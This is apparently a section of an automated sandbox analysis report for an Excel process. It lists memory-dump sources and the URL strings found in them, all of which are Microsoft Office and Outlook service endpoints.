Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.956514368.000000001340C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965853409.0000000013410000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://augloop-dogfood.officeppe.com;https://augloop-gcc.office.com;https://augloop.gov.online.offi
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://augloop.office.com
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://augloop.office.com/v2
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://augloop.office.com9
Source: EXCEL.EXE, 00000000.00000003.957338414.000000001333C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965698498.000000001333C000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://augloop.office.comLinkRequestApiPageTitleRetrievalhttps://uci.
Source: EXCEL.EXE, 00000000.00000002.965714297.0000000013354000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957360365.0000000013354000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlk
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://cdn.entity.
Source: EXCEL.EXE, 00000000.00000002.963180768.000000000FA50000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsellN
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://clients.config.office.net/
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://clients.config.office.net/#
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://clients.config.office.net/W
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies;
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx9
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://config.edge.skype.com
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://config.edge.skype.com/config/v1/OfficeU
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://cortana.ai
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://cortana.ai/api
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://cortana.ai0
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://cortana.aietl
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://cr.office.com
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://cr.office.comn
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://dataservice.o365filtering.com
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://dataservice.o365filtering.com/
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://dataservice.o365filtering.com/I
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://dataservice.o365filtering.comD1
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://dataservice.o365filtering.comO1t
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://dataservice.o365filtering.comd
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://dataservice.o365filtering.como
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: EXCEL.EXE, 00000000.00000003.957609902.00000000133B4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869052762.00000000133AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965787422.00000000133B5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812737746.00000000133AF000.00000004.00000001.sdmp String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesx
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://dev.cortana.ai
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://dev.cortana.aiQ
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://devnull.onenote.com
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://directory.services.
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://enrichment.osi.office.net/
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://enrichment.osi.office.net/$
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://enrichment.osi.office.net//
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v16
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
